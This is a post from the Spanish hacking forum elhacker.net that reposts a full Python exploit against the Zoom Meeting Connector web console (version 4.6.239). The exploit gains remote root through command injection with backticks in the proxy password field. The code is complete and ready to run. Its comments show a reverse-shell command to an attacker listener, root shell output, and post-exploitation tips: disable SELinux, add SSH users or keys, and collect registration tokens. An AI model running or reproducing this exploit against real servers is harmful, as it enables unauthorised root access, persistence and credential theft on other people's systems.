elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root Exploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root Exploit  (Leído 3,025 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root Exploit
« en: 5 Enero 2021, 00:48 am »

Zoom version 4.6.239.20200613 suffers from a Meeting Connector post-authentication remote root code execution vulnerability via the proxy server functionality. The latest Zoom client has this issue patched per Zoom.

Código
  1. #!/usr/bin/python
  2. # -*- coding: UTF-8 -*-
  3. #
  4. # zoomer.py
  5. #
  6. # Zoom Meeting Connector Post-auth Remote Root Exploit
  7. #
  8. # Jeremy Brown [jbrown3264/gmail]
  9. # Dec 2020
  10. #
  11. # The Meeting Connector Web Console listens on port 5480. On the dashboard
  12. # under Network -> Proxy, one can enable a proxy server. All of the fields
  13. # are sanitized to a certain degree, even the developers noting in the proxy()
  14. # function within backend\webconsole\WebConsole\net.py that they explicitly
  15. # were concerned with command injection and attempted to prevent it:
  16. #
  17. # if ('"' in proxy_name) or ('"' in proxy_passwd):  # " double quotes cannot be used to prevent shell injection
  18. #     is_valid = False
  19. #
  20. # It makes sense to leave some flexibility in the character limits here
  21. # passwords are often expected to contain more than alphanumeric characters.
  22. # But of course that means the Proxy Password field is still vulnerable to
  23. # command injection with the ` character.
  24. #
  25. # The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
  26. # Every three minutes, a task runs which executes this proxy script as root.
  27. # After submission the dashboard says “The proxy will take effect after the
  28. # server reboot!”, but the commands will still be executed within actually
  29. # requiring a reboot. Keep in mind that the commands will be executed blind.
  30. #
  31. # For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
  32. # this in the /tmp/proxy_test file:
  33. #
  34. # uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
  35. #
  36. # MMR was tested, but Controller and VRC may also be vulnerable
  37. #
  38. # Usage
  39. # > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
  40. # login succeeded
  41. # command sent to server
  42. #
  43. # $ nc -u -lvp 5555
  44. # ....
  45. # sh: no job control in this shell
  46. # sh-4.2# pwd
  47. # /root
  48. # sh-4.2#
  49. #
  50. # setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
  51. # check tokens in /opt/zoom/conf/register, check out the local environment, etc.
  52. #
  53. # Dependencies
  54. # - pip install pyquery
  55. #
  56. # Fix
  57. # Zoom says they've fixed this in the latest version
  58. #
  59.  
  60. import os
  61. import sys
  62. import argparse
  63. import requests
  64. import urllib.parse
  65. from pyquery import PyQuery
  66. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  67.  
  68. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  69.  
  70. class Zoomer(object):
  71.  def __init__(self, args):
  72.    self.target = args.target
  73.    self.port = args.port
  74.    self.username = args.username
  75.    self.password = args.password
  76.    self.command = args.command
  77.  
  78.  def run(self):
  79.    target = "https://" + self.target + ':' + str(self.port)
  80.  
  81.    session = requests.Session()
  82.    session.verify = False
  83.  
  84.    #
  85.    # get csrftoken from /login and use it to auth with creds
  86.    #
  87.    try:
  88.      resp = session.get(target + "/login")
  89.    except Exception as error:
  90.      print("Error: %s" % error)
  91.      return -1
  92.  
  93.    try:
  94.      csrftoken = resp.headers['set-cookie'].split(';')[0]
  95.    except:
  96.      print("Error: couldn't parse csrftoken from response header")
  97.      return -1
  98.  
  99.    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
  100.  
  101.    if(csrfmiddlewaretoken == None):
  102.      return -1
  103.  
  104.    data = \
  105.      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
  106.      'name':self.username,
  107.      'password':self.password}
  108.  
  109.    headers = \
  110.      {'Host':self.target + ':' + str(self.port),
  111.      'Referer':target,
  112.      'Cookie':csrftoken}
  113.  
  114.    try:
  115.      resp = session.post(target + "/login", headers=headers, data=data)
  116.    except Exception as error:
  117.      print("Error: %s" % error)
  118.      return -1
  119.  
  120.    if(resp.status_code != 200 or 'Wrong' in resp.text):
  121.      print("login failed")
  122.      return -1
  123.    else:
  124.      print("login succeeded")
  125.  
  126.    #
  127.    # get csrfmiddlewaretoken from /network/proxy and post cmd
  128.    #
  129.    try:
  130.      resp = session.get(target + "/network/proxy")
  131.    except Exception as error:
  132.      print("Error: %s" % error)
  133.      return -1
  134.  
  135.    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
  136.  
  137.    cookies = session.cookies.get_dict()
  138.  
  139.    #
  140.    # this happens with view-only users
  141.    #
  142.    if(len(cookies) < 2):
  143.      print("Error: failed to get session ID")
  144.      return -1
  145.  
  146.    command = '`' + self.command + '`'
  147.  
  148.    headers = \
  149.      {'Host':self.target + ':' + str(self.port),
  150.      'Referer':target,
  151.      'Cookie': \
  152.        'csrftoken=' + cookies['csrftoken'] + ';' + \
  153.        'sessionid=' + cookies['sessionid']}
  154.  
  155.    data = \
  156.      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
  157.      'proxyValue':1,
  158.      'proxyAddr':'localhost',
  159.      'proxyPort':8080,
  160.      'proxyName':'test',
  161.      'proxyPasswd':command}
  162.  
  163.    try:
  164.      resp = session.post(target + "/network/proxy", headers=headers, data=data)
  165.    except Exception as error:
  166.      print("Error: %s" % error)
  167.      return -1
  168.  
  169.    if(resp.status_code != 200):
  170.      print("something failed")
  171.      return -1
  172.    else:
  173.      print("command sent to server")
  174.  
  175.    return 0
  176.  
  177.  def get_token(self, body, name):
  178.    token = None
  179.  
  180.    pq = PyQuery(body)
  181.  
  182.    if(name == 'csrftoken'):
  183.      print("csrftoken")
  184.  
  185.    if(name == 'csrfmiddlewaretoken'):
  186.      token = pq('input').attr('value')
  187.  
  188.    return token
  189.  
  190. def arg_parse():
  191.  parser = argparse.ArgumentParser()
  192.  
  193.  parser.add_argument("target",
  194.            type=str,
  195.            help="Zoom server")
  196.  
  197.  parser.add_argument("-p",
  198.            "--port",
  199.            type=int,
  200.            default=5480,
  201.            help="Zoom port")
  202.  
  203.  parser.add_argument("username",
  204.            type=str,
  205.            help="Valid username")
  206.  
  207.  parser.add_argument("password",
  208.            type=str,
  209.            help="Valid password")
  210.  
  211.  parser.add_argument("command",
  212.            type=str,
  213.            help="Command to execute (replace space with $IFS ?)")
  214.  
  215.  args = parser.parse_args()
  216.  
  217.  return args
  218.  
  219. def main():
  220.  args = arg_parse()
  221.  
  222.  zm = Zoomer(args)
  223.  
  224.  result = zm.run()
  225.  
  226.  if(result > 0):
  227.    sys.exit(-1)
  228.  
  229. if(__name__ == '__main__'):
  230.  main()
  231.  
  232. #  0day.today [2021-01-05]  #


Fuente:
https://0day.today/exploit/35584
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con el exploit CVE-2010-3654 Remote Code Execution Vulnerability
Bugs y Exploits
NINGUNA1212 5 5,059 Último mensaje 3 Noviembre 2010, 19:11 pm
por Ivanchuk
Comtrend ADSL Router CT-5367 C01_R12 Remote Root
Bugs y Exploits
elforero 1 4,585 Último mensaje 25 Abril 2011, 11:43 am
por Ca0s
Root Exploit 2.6.32 -42.1
Nivel Web
BackBone 1 4,237 Último mensaje 23 Agosto 2012, 22:05 pm
por defektosk
Dudas sobre el API de twitter para php (user auth, app auth)
PHP
erest0r 2 2,002 Último mensaje 18 Junio 2015, 23:01 pm
por erest0r
Exploit root Xperia mini pro
Bugs y Exploits
Jack. 0 2,669 Último mensaje 31 Octubre 2015, 18:33 pm
por Jack.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines